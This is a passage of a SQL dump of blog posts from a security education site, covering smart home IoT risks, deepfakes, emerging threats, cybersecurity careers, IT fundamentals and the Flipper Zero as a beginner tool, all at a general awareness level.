Weaknesses\n\nIoT devices often operate over shared home networks. When attackers gain unauthorized access to one device, they can quickly move laterally into other connected devices, creating a domino effect.\n\n## Real-World Examples\n\nHistory has shown that these vulnerabilities are not just theoretical concerns; they\'ve been exploited in real and alarming ways.\n\n### 1. The Mirai Botnet Attack\n\nThe 2016 Mirai botnet infected insecure IoT devices like security cameras and baby monitors, assembling them into a massive botnet that launched one of the largest distributed denial-of-service (DDoS) attacks in history. It disrupted major websites like Twitter, Netflix, and PayPal.\n\n### 2. Hacking Smart Thermostats\n\nHackers have demonstrated their ability to take control of smart thermostats, as was publicly shown at the DEF CON cybersecurity conference in 2018. A compromised thermostat could not only disrupt comfort but even result in extreme energy costs.\n\n### 3. Unauthorized Surveillance\n\nSeveral cases have emerged where hackers gained access to smart home security cameras, spying on unsuspecting users. Perhaps one of the most harrowing incidents involved attackers who lashed out verbally at homeowners through hacked smart cameras like those by Ring.\n\n### 4. Stolen Data Logs\n\nVoice assistants that capture recordings of your conversations have been hacked, leading to unauthorized access to sensitive personal data. The Telesploit attack, for instance, proved that attackers could easily exploit Amazon Echo setups using Wi-Fi vulnerabilities.\n\nThese examples highlight the potential for IoT misuse, turning \"convenience\" into a threat.\n\n## Expert Opinions on IoT Security\n\nTo unpack the issue, we asked cybersecurity professionals for their insights on IoT safety. Here\'s what they had to say.\n\n### Dr. Emily Crane, Cybersecurity Researcher\n\n_\"IoT devices are often built faster than they\'re secured. Developers should design security into the software, but users also play a critical role by configuring their devices properly and updating them regularly.\"_\n\n### Mike Liu, Ethical Hacker\n\n_\"Most attacks are preventable with basic measures like strong passwords and segregated networks. However, we can\'t ignore the manufacturer\'s responsibility to ensure devices come with better encryption protocols and auto-update features.\"_\n\n### Jennifer Alvarez, Head of IoT Security at SecureShield\n\n_\"The IoT revolution is exciting but comes with an inherent trade-off between convenience and security. The only question is whether users and manufacturers will take the necessary steps to minimize risk before it\'s too late.\"_\n\n## Practical Security Measures\n\nThe good news is that securing your smart home is entirely attainable with the right steps. Here’s a practical checklist to make your IoT setup safer.\n\n### 1. Change Default Passwords\n\nImmediately replace factory-set passwords with strong, unique ones. A mix of uppercase letters, numbers, and special characters is ideal.\n\n### 2. Enable Two-Factor Authentication (2FA)\n\nWhenever possible, enable 2FA for an additional layer of protection beyond your password.\n\n### 3. Keep Your Firmware Updated\n\nRegularly check for and install updates on all IoT devices. If your device lacks update support, consider replacing it with one that does.\n\n### 4. Use a Separate Network for IoT Devices\n\nCreate a guest Wi-Fi network exclusively for your smart devices. Separating them from your primary network could limit exposure if one device gets hacked.\n\n### 5. Disable Unnecessary Features\n\nTurn off features like Universal Plug and Play (UPnP) unless absolutely necessary.\n\n### 6. Encrypt Your Network and Devices\n\nEnsure your Wi-Fi network is encrypted using WPA3 (or at least WPA2) protocols. Additionally, enable encryption on any device that allows it.\n\n## The Future of IoT Security\n\nIoT security is evolving, making it both exciting and daunting. Here’s what the future holds for the industry.\n\n### 1. AI-Driven Security\n\nArtificial intelligence is being integrated into IoT devices to detect and mitigate threats automatically. Smart threat detection services powered by AI algorithms could revolutionize end-user security.\n\n### 2. Standardization Efforts\n\nRegulators are stepping in to push for standard IoT security frameworks, ensuring comprehensive protections for consumers.\n\n### 3. Blockchain for IoT\n\nBlockchain technology may offer decentralized, tamper-proof security for IoT devices, reducing vulnerabilities in data transmission.\n\n### 4. 5G and Beyond\n\nWhile 5G speeds will supercharge IoT functionality, they will also open the gates for more complex cyberattacks. IoT security will need to evolve in tandem with connectivity upgrades.', '', 'http://infoseclabs.io/uploads/1767565053972-660878437.jpg', 'A modern smart home setup with connected IoT devices', 1, 'published', '2026-01-04 01:09:00', '2026-01-05 01:17:36', 'Information Security', 'Smart Homes: Convenience vs. Security Risks', 'Explore smart home security challenges and learn steps to protect your IoT devices from cyber threats.', 'Smart Home Security'), (15, 'Deepfakes and Cybersecurity Risks: What You Need to Know', 'deepfakes-and-cybersecurity-risks-what-you-need-to-know', '# The Growing Threat of Deepfakes in Cybersecurity\n\nWith AI rapidly evolving, deepfakes have transformed from simple internet curiosities into significant cybersecurity threats. Their ability to forge realistic audio and video content puts individuals, organizations, and even governments at risk. But how do these AI-generated movies of deception actually work, what dangers do they pose, and most importantly, how can we fight back?\n\nThis article explores the intersection of deepfakes and cybersecurity, real-world examples of attacks, how they bypass security systems, and the tools and strategies experts recommend to detect and prevent them.\n\n## What Are Deepfakes?\n\nDeepfakes are AI-generated media that convincingly mimic real people\'s voices, faces, or behaviors. Created using **deep learning algorithms** like _generative adversarial networks (GANs)_, these forgeries can produce fake videos, audio, and even live streams that are almost indistinguishable from authentic recordings.\n\nFor instance, imagine a video where a high-profile CEO appears to announce false financial data, or a phone call where the \"voice\" of your manager requests an urgent wire transfer. These aren\'t hypothetical anymore; such deepfake attacks are happening now.\n\nWhile deepfakes can be used creatively—for entertainment, art, and training simulations—they pose significant risks when exploited maliciously.\n\n## Deepfakes and Cybersecurity: Understanding the Risks\n\nDeepfakes are no longer just tools for pranks or misinformation; they’re now a weapon in the arsenal of cybercriminals. Here’s why they’re such a growing concern in cybersecurity:\n\n### 1. Identity Fraud and Personal Risks\n\nDeepfakes can be used to impersonate individuals for phishing scams, such as creating fabricated videos of someone requesting sensitive corporate data. Worse, personal embarrassment and reputational harm caused by fake videos have been weaponized in cases like political defamation or revenge porn.\n\n### 2. Corporate Espionage\n\nCybercriminals can use deepfakes to impersonate executives or employees in video conferences to steal business secrets, authorize financial actions, or manipulate decisions.\n\n### 3. Disinformation Campaigns\n\nDeepfakes can influence public opinion by spreading disinformation during elections, protests, or corporate crises. This magnifies their potential as a tool for political or social manipulation.\n\n### 4. Eroding Trust\n\nWith deepfake technology becoming more sophisticated, it’s harder to distinguish truth from fiction. This \"truth decay\" affects trust in communications, digital evidence, and even democracy.\n\n## Real-World Examples of Deepfake Cyberattacks\n\nUnderstanding how deepfakes are exploited in real scenarios helps us better anticipate and address these risks. Here are five notable cases, along with measures that could mitigate similar attacks in the future:\n\n### 1. Deepfake Voice Scam on a UK CEO\n\nCybercriminals used AI-generated audio to mimic the voice of the CEO\'s boss, requesting a €220,000 transfer to a \"supplier.\" The attack was successful.\n\n**Preventative Measure**: Two-factor authentication and requiring written confirmation for financial transactions could have stopped this scam.\n\n### 2. Elon Musk-Deepfake Cryptocurrency Fraud\n\nDeepfakes of Elon Musk have been used in fabricated videos promoting fraudulent cryptocurrency schemes, tricking users into investing.\n\n**Preventative Measure**: Educating users about phishing red flags and introducing real-time deepfake detection tools can safeguard against such schemes.\n\n### 3. Deepfake Videos in Indian Elections\n\nDeepfake videos of political leaders were used to spread false campaign messages to promote divisive misinformation.\n\n**Preventative Measure**: Strengthening media literacy campaigns and fact-checking initiatives can help fight disinformation in politically charged contexts.\n\n### 4. Manipulated Security Footage\n\nDeepfake-altered surveillance footage was once demonstrated as a proof-of-concept to frame someone for crimes they didn’t commit, though thankfully not used in real trials.\n\n**Preventative Measure**: Blockchain systems verify authenticity by timestamping video metadata, making it tamper-proof.\n\n### 5. Social Media Exploitation\n\nCybercriminals have used doctored live streams to request donations or funds intended for fake causes.\n\n**Preventative Measure**: AI tools like ClearView or social media verification systems can be used to validate livestream sources.\n\n## Technical Analysis: How Deepfakes Bypass Security Measures\n\nDeepfakes rely on advanced neural networks that learn to mimic real-world data. Here’s why they can bypass traditional security defenses.\n\n### 1. Advanced AI Algorithms\n\nDeepfakes use _Generative Adversarial Networks (GANs)_ where one AI model generates fake content and another AI model evaluates its realism. This iterative process results in increasingly lifelike forgeries that fool both humans and AI detection models.\n\n### 2. Spoofing Techniques in Biometrics\n\nDeepfakes can deceive biometric authentication systems, such as facial recognition and voice verification, by providing high-definition, AI-generated replicas.\n\n### 3. Weak Detection Software\n\nMuch of the world’s current security software is optimized for older forms of attacks (e.g., ransomware). They lack the sophistication needed to detect dynamic or subtle anomalies in video/audio files generated by deepfake technology.\n\n## Prevention and Detection: Tools and Strategies\n\nStaying ahead of deepfake threats requires proactive strategies and cutting-edge tools. Here’s what cybersecurity professionals recommend:\n\n### 1. Use Deepfake Detection Tools\n\nAI-powered detection tools like Sensity.ai, Deepware Scanner, and Microsoft’s Video Authenticator analyze videos and audio for signs of manipulation.\n\n### 2. Enhanced Biometric Authentication\n\nImplement multi-modal biometric verification, combining face, voice, behavior, and iris detection for secure confirmation.\n\n### 3. Blockchain for Media Authentication\n\nUse blockchain to track the provenance of digital media files, including timestamps and metadata verification. Companies like Truepic are paving the way for secure media authentication.\n\n### 4. Training and Awareness\n\nEducate employees and individuals on recognizing potential deepfake scams and phishing attempts. Awareness remains one of the most important defenses.\n\n### 5. Regulatory Frameworks and Collaboration\n\nAdvocate for tighter regulations surrounding the use and creation of AI-generated content. Governments, tech firms, and cybersecurity agencies must work collectively to combat deepfake misuse.\n\n## The Future of Deepfakes and Cybersecurity\n\nDeepfake technology will only continue to evolve, offering even more realistic forgeries in the years to come. But with new defensive innovations also emerging, professionals in cybersecurity, policy-making, and tech industries still have an opportunity to minimize harm.\n\nFor instance, advancements in real-time detection algorithms and ethical AI standards may reduce their potential applications in cybercrime. Massive investments in media verification technologies are also gearing up to seal vulnerabilities.\n\n## Staying Ahead of the Curve\n\nThe risks posed by deepfakes to cybersecurity are real and growing. However, by staying informed, investing in preventative measures, and relying on innovative detection tools, individuals and organizations can counteract these threats effectively.\n\nAt the heart of cybersecurity is a principle that has always been true: education and preparation go hand-in-hand.', '', 'http://infoseclabs.io/uploads/1767564733348-245296497.jpeg', 'Illustration of deepfake technology impacting cybersecurity with video manipulation', 1, 'published', '2026-01-04 09:12:00', '2026-01-05 01:12:33', 'Information Security', 'Deepfakes: A New Cybersecurity Threat', 'Explore how deepfakes pose cybersecurity risks and learn strategies to combat these AI threats.', 'Deepfakes'), (16, 'Exploring the Future of Cybersecurity: Emerging Threats and Tech Innovations', 'exploring-the-future-of-cybersecurity-emerging-threats-and-tech-innovations', '# The Future of Cybersecurity: Emerging Threats and Technological Advancements\n\nThe cybersecurity landscape is evolving faster than ever before, fueled by rapid technological advancements and an expanding digital footprint. From data breaches targeting small businesses to sophisticated state-sponsored attacks, the need for robust cybersecurity has never been greater. But what does the future hold for cybersecurity? This blog dives deep into emerging threats, groundbreaking technologies, and the skills required to combat cybercrime in the years ahead.\n\n## The Current State of Cybersecurity\n\nCybersecurity has become a top priority for businesses, governments, and individuals worldwide. A report by IBM Security reveals that the average cost of a data breach in 2023 reached $4.45 million, underscoring the financial and reputational damage caused by cyberattacks.\n\nThe challenges, however, are multifaceted. Ransomware attacks have surged, phishing campaigns are more sophisticated than ever, and vulnerable Internet of Things (IoT) devices have expanded the attack surface. While organizations are investing heavily in cybersecurity tools, the landscape continues to shift, demanding constant vigilance and innovation to stay ahead.\n\n## Emerging Cybersecurity Threats\n\nThe future of cybersecurity is shaped largely by the threats we face today and those emerging on the horizon. Below are the key threats to watch as we look to the future:\n\n### 1. AI-Powered Cyberattacks\n\nArtificial intelligence has revolutionized several industries, and unfortunately, cybercriminals are no exception. AI can be weaponized to launch more sophisticated and targeted attacks, such as:\n\n- **Deepfake Scams**: AI-generated videos and audio can convincingly impersonate individuals, leading to fraud, corporate espionage, or disinformation campaigns.\n- **Automated Phishing**: AI can create highly personalized phishing emails at scale, making them more convincing and effective.\n- **Adversarial Machine Learning**: Cyberattackers manipulate AI models used in cybersecurity systems, rendering them ineffective.\n\n### 2. IoT Vulnerabilities\n\nThe Internet of Things is set to grow to over **75 billion connected devices by 2025**, according to Statista. While IoT devices bring convenience and efficiency, their lack of robust security measures makes them prime targets for hackers. Attackers can exploit vulnerabilities in smart home devices, medical equipment, and industrial machinery, causing widespread disruptions and even endangering lives.\n\n### 3. Quantum Computing Risks\n\nQuantum computers have the potential to break traditional encryption protocols, threatening the security of sensitive data across industries. Although quantum computing is still in its early stages, experts warn that malicious actors and even nation-states are exploring its potential to outpace current encryption technologies.\n\n### 4. Supply Chain Attacks\n\nCybercriminals are increasingly targeting supply chains as a weak link in organizational defenses. By inserting malicious code into software updates or third-party vendor systems, attackers can gain access to larger networks, impacting multiple organizations simultaneously.\n\n### 5. The Rise of Geopolitical Cyberwarfare\n\nNation-states are engaging in cyberwarfare to disrupt critical infrastructure, steal intellectual property, and manipulate public opinion. These politically motivated attacks could become more frequent and destructive, especially as geopolitical tensions escalate.\n\n## Technological Advancements Shaping the Future\n\nWhile cyber threats proliferate, advancements in technology hold tremendous promise for enhancing cybersecurity. Here are some of the cutting-edge technologies poised to redefine cybersecurity:\n\n### 1. AI in Threat Detection\n\nAI is not just a tool for cybercriminals; it’s also a powerful defense mechanism. Advanced AI algorithms can analyze vast streams of data in real-time to detect anomalies, predict potential attacks, and respond to threats before they can cause damage.\n\nFor example, machine learning-based security systems can identify unusual patterns of behavior, like unauthorized access attempts, and automatically isolate affected systems to prevent breaches.\n\n### 2. Blockchain for Secure Transactions\n\nBlockchain technology, known for powering cryptocurrencies like Bitcoin, is being leveraged for secure data sharing and decentralized authentication. By recording transactions in a tamper-proof ledger, blockchain reduces the risk of data breaches and ensures transparency.\n\nBlockchain is particularly promising for financial institutions, healthcare providers, and supply chain networks that require traceable and secure transactions.\n\n### 3. Zero Trust Architecture\n\nThe \"trust no one\" principle is gaining traction in cybersecurity through Zero Trust Architecture. This approach ensures that every user, device, and application is continuously verified before being granted access, minimizing the risk of insider threats and unauthorized access.\n\n### 4. Biometric Authentication\n\nTraditional passwords are rapidly being replaced by biometric authentication methods such as fingerprint scanning and facial recognition. These systems offer a higher level of security as they are harder to replicate or steal.\n\n### 5. Post-Quantum Cryptography\n\nWith the threat of quantum computing on the horizon, researchers are developing post-quantum cryptography methods to secure sensitive information. These encryption protocols are designed to withstand attacks from quantum computers, ensuring data remains protected in the future.\n\n## Skills and Training for the Cybersecurity Workforce\n\nThe success of future cybersecurity efforts will depend heavily on skilled professionals equipped to address evolving challenges. Here’s how organizations can empower their workforce:\n\n### 1. Prioritize Continuous Learning\n\nThe cybersecurity field is dynamic, and professionals need to stay up-to-date with the latest tools, technologies, and threat landscapes. Certifications like Certified Information Systems Security Professional (CISSP) and Certified Ethical Hacker (CEH) are valuable for keeping skills sharp.\n\n### 2. Develop AI Expertise\n\nUnderstanding how AI operates, including its strengths and vulnerabilities, will be essential for combating AI-driven attacks. Training programs that focus on integrating AI into cybersecurity strategies are critical.\n\n### 3. Promote Ethical Hacking\n\nEthical hackers, or white-hat hackers, play a vital role in identifying vulnerabilities before malicious actors can exploit them. Organizations should invest in ethical hacking programs to bolster their defenses.\n\n### 4. Foster Diversity and Inclusion\n\nA diverse workforce brings fresh perspectives and innovative problem-solving approaches. Encouraging inclusivity in cybersecurity hiring practices enhances the industry\'s capabilities overall.\n\n## Predictions and Recommendations for the Future\n\nCybersecurity will only grow more complex in the coming years. Here are some key predictions and actionable recommendations for businesses and professionals looking to stay ahead:\n\n- **Prediction 1**: AI-based cybersecurity systems will become the industry standard within the next five years.\n - **Recommendation**: Invest in AI-driven solutions now to future-proof your organization against emerging threats.\n\n- **Prediction 2**: Regulations and compliance requirements will tighten globally.\n - **Recommendation**: Stay informed about legislation like GDPR and CCPA, and ensure your security frameworks meet compliance standards.\n\n- **Prediction 3**: Cybersecurity insurance will become a necessity.\n - **Recommendation**: Secure a comprehensive cybersecurity insurance plan to mitigate potential risks and financial losses.', '', 'http://infoseclabs.io/uploads/1767564873422-280949463.jpg', 'Digital lock symbolizing cybersecurity with tech icons', 1, 'published', '2026-01-04 17:14:00', '2026-01-05 01:14:39', 'Information Security', 'Emerging Tech & Its Impact on Cybersecurity', 'Explore how emerging technologies like AI & IoT shape the future of cybersecurity and introduce new threats.', 'Emerging technologies'), (17, 'Unlocking Cybersecurity: Alternative Career Paths Beyond Pentesting', 'unlocking-cybersecurity-alternative-career-paths-beyond-pentesting', '# Exploring Diverse Careers in Cybersecurity\n\nCybersecurity is often synonymous with penetration testing, or \"pentesting.\" It\'s an exciting career that involves identifying vulnerabilities in systems by attempting to \"hack\" into them before malicious actors do. However, while pentesting grabs the spotlight, the field of cybersecurity is far more diverse than many realize.\n\nIf you\'re an IT professional, a cybersecurity enthusiast, or exploring a career pivot, this guide will introduce you to some rewarding alternative careers in cybersecurity. Whether you\'re looking to escape the competitive pentesting job market or discover a role that better suits your skills, you\'re in for an eye-opening exploration of options.\n\n## Why Look Beyond Pentesting?\n\nPentesting is a well-known cybersecurity role, but its popularity has its downsides. The market for pentesters has become more saturated in recent years, making it harder to break into or advance in the field. Additionally, professionals in this space sometimes report less financial fulfillment than they anticipated.\n\nThe good news? Cybersecurity is an incredibly dynamic field with options that extend far beyond pentesting, offering paths that are equally impactful, lucrative, and in demand.\n\n## Top Alternative Careers in Cybersecurity\n\nHere are some lesser-known roles worth exploring in this exciting industry, complete with insights into their responsibilities, required skills, and career potential.\n\n### 1. Security Engineer\n\n**What They Do:**\n\nSecurity engineers focus on designing, building, and maintaining robust security systems and protocols to protect organizations from cyber threats. Instead of identifying vulnerabilities like pentesters, they proactively build defenses to avert attacks.\n\n**Key Skills:**\n\n- Familiarity with security tools and products.\n- Experience in systems integration and implementation.\n- Problem-solving and troubleshooting expertise.\n\n**Career Opportunities:**\n\nMany security engineers take on roles in pre-sales or post-sales for organizations, helping customers adopt security solutions effectively. With businesses scaling their digital footprints, these professionals are in high demand.\n\n### 2. Security Operations Center (SOC) Analyst\n\n**What They Do:**\n\nSOC analysts monitor an organization\'s network in real-time, watching for suspicious behavior and responding to security incidents. They operate on the front lines of cybersecurity defense, mitigating risks as they arise.\n\n**Progression Levels:**\n\nSOC analysts typically begin at Level 1 (entry-level), where they monitor activity and flag threats. With experience, they can move into Level 2 or Level 3 roles, which involve complex investigations and response strategies.\n\n### 3. Cybersecurity Solution Architect\n\n**What They Do:**\n\nCybersecurity solution architects design high-level frameworks that secure organizational infrastructure. They ensure that systems are scalable and resilient to evolving threats.\n\n**Key Skills:**\n\n- Deep understanding of both cybersecurity and IT infrastructure.\n- Ability to identify risks and proactively mitigate them using effective designs.\n- Proficiency in cybersecurity tools and enterprise systems.\n\nFor those with a knack for strategy and technology, this role offers tremendous growth opportunities.\n\n### 4. Governance, Risk, and Compliance (GRC) Specialist\n\n**What They Do:**\n\nA GRC specialist helps organizations meet regulatory standards, enforce policies, and minimize risks. They often play an advisory role by conducting audits, managing compliance frameworks, and ensuring the organization aligns with laws like GDPR or SOX.\n\n**Why It’s Rewarding:**\n\nCompliance isn’t just about ticking boxes; it’s about building trust, mitigating financial risks, and enabling long-term business success.\n\n### 5. Cybersecurity Auditor\n\n**What They Do:**\n\nCybersecurity auditors evaluate an organization’s security measures, identifying vulnerabilities and providing recommendations to improve. Their work ensures that systems are safe, efficient, and compliant with industry standards.\n\n**Required Skills:**\n\n- Expertise in audit compliance protocols.\n- Strong risk management capabilities.\n- Analytical mindset for identifying gaps in existing security measures.\n\n### 6. Cloud Security Specialist\n\n**What They Do:**\n\nAs more businesses migrate their operations to the cloud, cloud security specialists are tasked with safeguarding sensitive data and securing cloud-based platforms. They implement access controls, monitor for threats, and ensure systems are compliant with cloud regulations.\n\n**Why It Matters:**\n\nCloud expertise is in short supply, making this one of the most sought-after roles in cybersecurity today.\n\n## Making the Transition\n\nEager to branch out into one of these roles? Here’s how to make a seamless transition into your ideal cybersecurity career.\n\n### Build Foundational IT Skills\n\nIf you’re new to cybersecurity, start with roles like system administrator, software developer, or helpdesk technician. These will provide a solid foundation in IT and networking principles.\n\n### Specialize and Gain Certifications\n\nCertifications are often a critical stepping stone in cybersecurity. Some valuable ones include:\n\n- **CISSP (Certified Information Systems Security Professional):** Perfect for advanced roles like cybersecurity architect or GRC specialist.\n- **CISM (Certified Information Security Manager):** Ideal for governance and compliance roles.\n- **CEH (Certified Ethical Hacker):** Helpful if you want to enhance your penetration testing skills or transition into a SOC analyst role.\n\n### Gain Practical Experience\n\nHands-on experience is vital. Look for internships, contribute to open-source projects, or invest in lab environments like TryHackMe and Hack The Box.\n\n### Stay Current Through Continuous Learning\n\nCybersecurity evolves rapidly. Attend webinars, follow cybersecurity blogs, and participate in niche forums or events like Black Hat or DEF CON. Staying ahead requires staying informed.\n\n## A Rewarding Cybersecurity Career Awaits\n\nCybersecurity is an expansive field with opportunities far beyond pentesting. Whether you become a security engineer, cloud security specialist, or GRC expert, each role offers its own challenges and rewards.\n\nThe key is to explore your interests, focus on building the right skills, and stay adaptable in this ever-changing industry. By doing so, you’ll not only advance your career but also play a critical role in safeguarding the digital world.', '', 'http://infoseclabs.io/uploads/1767564951123-96955238.png', 'Various cybersecurity professionals collaborating in an office setting', 1, 'published', '2026-01-04 09:15:00', '2026-01-05 01:19:09', 'Information Security', 'Explore Cybersecurity Careers Beyond Pentesting', 'Discover diverse, rewarding cybersecurity careers beyond pentesting. Explore roles like Security Engineer, SOC Analyst, and more.', 'Cybersecurity Careers'); INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES (18, 'Kickstart Your Cybersecurity Career: Essential IT Fundamentals You Need to Know', 'kickstart-your-cybersecurity-career-essential-it-fundamentals-you-need-to-know', '# Kickstart Your Cybersecurity Career: Mastering IT Fundamentals\n\nAre you intrigued by the dynamic world of cybersecurity but unsure how to take the first step? A successful career in cybersecurity begins with mastering the fundamentals of IT. Understanding the essential concepts of hardware, software, networking, applications, and basic security practices not only lays a strong foundation but also equips you to tackle real-world challenges with confidence.\n\nThis guide will walk you through why IT knowledge is indispensable for cybersecurity, the core areas you need to focus on, how to acquire these skills, and the exciting career paths you can pursue in this field.\n\n## Why IT Fundamentals Matter for Cybersecurity\n\nBefore you can secure technology, you need to understand how it works. IT fundamentals give you the essential skills to configure and troubleshoot hardware, grasp how networking facilitates communication, identify vulnerabilities in systems and applications, and comprehend core cybersecurity principles.\n\nThink of IT knowledge as the stepping stone to your cybersecurity career. For instance, without a solid understanding of how a Layer 2 switch operates, implementing port security on that switch would be nearly impossible. Similarly, familiarity with operating systems like Windows or Linux is crucial for effectively deploying advanced tools and processes in the future.\n\nUnderstanding IT gives you the power to analyze and resolve technical issues, secure systems proactively, and build innovative solutions to protect sensitive information.\n\n## The Five Core Categories of IT Fundamentals\n\nTo build a strong IT foundation, focus on mastering these five categories. Each one plays a critical role in shaping your cybersecurity expertise.\n\n### 1. Hardware\n\nLearn the physical components of computers, such as processors, memory, and storage. Knowing how hardware works enables you to identify and resolve potential issues like faulty wiring or overheating. Mastering hardware configuration also sets the stage for securing physical devices against unauthorized access.\n\n### 2. Software\n\nExplore the world of operating systems and applications. Understand the basics of programs like word processors, browser clients, and operating systems such as Windows, macOS, and Linux. Gaining this knowledge allows you to analyze how software functions, which is vital for identifying vulnerabilities or misconfigurations.\n\n### 3. Networking\n\nNetworking is the backbone of modern communication, making it a critical area to understand. Learn how devices connect, share resources, and transfer data across networks. Concepts like IP addresses, protocols, and network topologies are key to identifying potential points of failure or attack.\n\n### 4. Applications\n\nApplications are the tools we use daily to accomplish specific tasks. From email clients to customer relationship management (CRM) software, understanding how applications interact with operating systems and hardware is crucial to ensuring their security and performance.\n\n### 5. Security Basics\n\nNo system is entirely free of risk. Security fundamentals teach you to recognize vulnerabilities, assess risks, and implement proactive defenses. Gain insight into best practices for password management, encryption, and patch updates to minimize threats.\n\nThese building blocks ensure that you have a comprehensive understanding of technology before advancing into more complex cybersecurity concepts.\n\n## Essential Skills to Acquire\n\nAspiring cybersecurity professionals should focus on acquiring specific IT skills that directly apply to real-world challenges. Here are a few necessary skills to get you started:\n\n- **Hardware Configuration**: Assemble and troubleshoot computer systems to fully understand their physical components.\n- **Operating System Management**: Learn how to install, configure, and maintain OS environments like Windows and Linux.\n- **Network Troubleshooting**: Gain practical knowledge in diagnosing and resolving connectivity issues.\n- **Threat Identification**: Learn how to spot and mitigate security threats, such as malware or phishing attempts.\n- **Ethical Hacking**: Understand the basics of offensive security measures, such as penetration testing, in a controlled and ethical environment.\n\nThese skills not only make you well-rounded but also prepare you to specialize in areas like digital forensics or penetration testing.\n\n## How to Learn IT Fundamentals\n\nFortunately, there’s a wealth of resources to help you learn IT fundamentals and cybersecurity basics. Whether you prefer structured courses or hands-on practice, there’s something for everyone.\n\n### Online Platforms\n\n- **FreeCodeCamp** offers free, beginner-friendly lessons on IT basics.\n- **Udemy** has courses like [Complete Introduction to Cybersecurity](https://udemy.com/course/complete-introduction-to-cybersecurity) by Grant Collins, which covers IT and cybersecurity fundamentals for beginners.\n- **YouTube** provides in-depth tutorials from trusted sources like Google and online tech communities.\n\n### Certification Programs\n\nCertifications validate your knowledge and show employers that you’re serious about your career. Consider starting with foundational credentials like CompTIA IT Fundamentals (ITF+) or Cisco’s CCNA certification.\n\n### Community Engagement\n\nJoin online communities, attend webinars, and participate in live Q&A sessions. Groups like Cybercademy provide career advice, security projects, and support networks for professionals and students.\n\n### Hands-On Practice\n\nSet up virtual environments, like Kali Linux virtual machines, to experiment safely. Test tools and configurations to gain real-world experience.\n\nPractical projects not only enhance your technical skills but also build confidence as you apply theoretical knowledge to solve problems.\n\n## Cybersecurity Career Paths\n\nOnce you’ve mastered the basics, you’ll be ready to explore specialized roles within cybersecurity. Here are some popular career paths to consider:\n\n### Security Analyst\n\n- **Responsibilities**: Monitor and analyze security threats, respond to incidents, and implement security measures.\n- **Skills Needed**: Incident response, threat analysis, and knowledge of SIEM tools.\n\n### Network Engineer\n\n- **Responsibilities**: Design, implement, and maintain secure network architectures.\n- **Skills Needed**: Networking protocols, firewall configuration, and VPN setup.\n\n### Cybersecurity Consultant\n\n- **Responsibilities**: Assess organizational security risks, provide recommendations, and develop strategies to safeguard systems.\n- **Skills Needed**: Risk assessment, policy development, and regulatory compliance knowledge.\n\nEach role offers unique challenges and opportunities, allowing you to make a meaningful impact by defending businesses against cyber threats.\n\n## Start Building Your Cybersecurity Knowledge\n\nCybersecurity is an exciting and rewarding field, but a clear foundational knowledge is essential for success. Understanding IT fundamentals equips you with the skills and confidence needed to tackle advanced cybersecurity concepts down the line.\n\nBegin your educational journey today with resources that fit your learning style. Whether through online courses, practice projects, or community interactions, consistent learning and hands-on experience will pave the way for a successful cybersecurity career.', '', 'http://infoseclabs.io/uploads/1767565249662-511498932.jpeg', 'Person studying IT fundamentals for cybersecurity career', 1, 'published', '2026-01-04 09:19:00', '2026-01-05 01:20:50', 'Information Security', 'Start Your Cybersecurity Career: IT Essentials', 'Discover essential IT fundamentals to launch a successful cybersecurity career. Learn hardware, software, networking, and more.', 'IT fundamentals'), (19, 'Flipper Zero: The Ultimate Starter Tool for Aspiring Cybersecurity Experts?', 'flipper-zero-the-ultimate-starter-tool-for-aspiring-cybersecurity-experts', '# Exploring Cybersecurity: Is Flipper Zero the Right Starting Point?\n\nIf you\'re venturing into the vast world of cybersecurity, you\'ve probably encountered the term \"Flipper Zero.\" This versatile device has gained popularity among ethical hackers, tech hobbyists, and security enthusiasts. With a sleek design and an adorable dolphin mascot, Flipper Zero is a portable hacking tool capable of exploring, analyzing, and interacting with various digital systems. But is it the best choice for beginners, or are there better alternatives for starting your cybersecurity journey?\n\nThis blog will guide you by exploring Flipper Zero\'s capabilities, assessing its pros and cons for beginners, and introducing alternative ways to build strong foundational skills in cybersecurity.\n\n## Is Flipper Zero a Good Starting Point for Cybersecurity?\n\nTo put it simply, Flipper Zero can be *a tool*, but it might not be *the tool* to begin your cybersecurity exploration. Let\'s break it down.\n\n### What Is Flipper Zero?\n\nFlipper Zero is a multifunctional device designed primarily for security testing and research. It leverages common communication protocols like RFID, NFC, infrared, and Bluetooth, making it useful for learning how these technologies function and exploring their vulnerabilities. With Flipper Zero, you can analyze signals, capture data packets, and even experiment with embedded hardware such as radio frequencies.\n\n### Pros of Starting with Flipper Zero\n\n- **Hands-on Insight into Various Technologies:** Flipper Zero offers real-world exposure to communication protocols such as RFID and NFC.\n- **Portable and Beginner-Friendly:** Its playful interface is unintimidating, making it a fun starting point for beginners with a tech affinity.\n- **Affordable Entry into Hardware Hacking:** Compared to high-end hardware hacking tools, Flipper Zero is relatively budget-friendly.\n- **Community Support:** The Flipper Zero community is active and ready to help new users experiment and troubleshoot.\n\n### Cons of Starting with Flipper Zero\n\n- **Limited Learning Scope for Beginners:** While it\'s great for hardware hacking, Flipper Zero doesn’t cover critical cybersecurity foundations like ethical hacking principles, network security basics, or malware analysis.\n- **Steep Learning Curve Without Context:** Without a foundational understanding of cybersecurity concepts, beginners may find the tool intimidating or struggle to use it meaningfully.\n- **Risk of Misuse:** Depending on where and how it\'s used, Flipper Zero may unintentionally steer newcomers toward ethically ambiguous practices.\n\n**Bottom Line:** While Flipper Zero is an excellent supplementary tool for intermediate users or those with technical know-how, it’s not an all-encompassing resource for beginners. You\'ll need additional learning pathways to properly establish a clear cybersecurity foundation.\n\n## What Are the Best Alternatives for Beginners?\n\nIf you’re just starting, opting for tools and platforms designed to teach foundational cybersecurity concepts might be a better path. Here are some beginner-friendly resources you can explore.\n\n### 1. Learning Platforms and Tutorials\n\n- **Hack The Box:** A platform with hands-on labs tailored for all skill levels. They offer challenges ranging from simple exercises to complex simulations.\n- **TryHackMe:** Beginner-friendly tutorials that incorporate guided instructions and hands-on challenges to get you started with ethical hacking and cybersecurity concepts.\n- **Cybrary:** A learning hub with free and paid courses on penetration testing, digital forensics, and more.\n- **Codecademy and FreeCodeCamp:** Great for learning programming languages like Python, which is crucial in cybersecurity.\n\n### 2. Open Source Tools\n\n- **Kali Linux:** One of the most popular operating systems for penetration testing and ethical hacking.\n- **Wireshark:** Essential for network analysis and learning how data moves across systems.\n- **Metasploit Framework:** A penetration testing tool perfect for learning about exploit techniques and system vulnerabilities.\n\n### 3. Beginner-Friendly 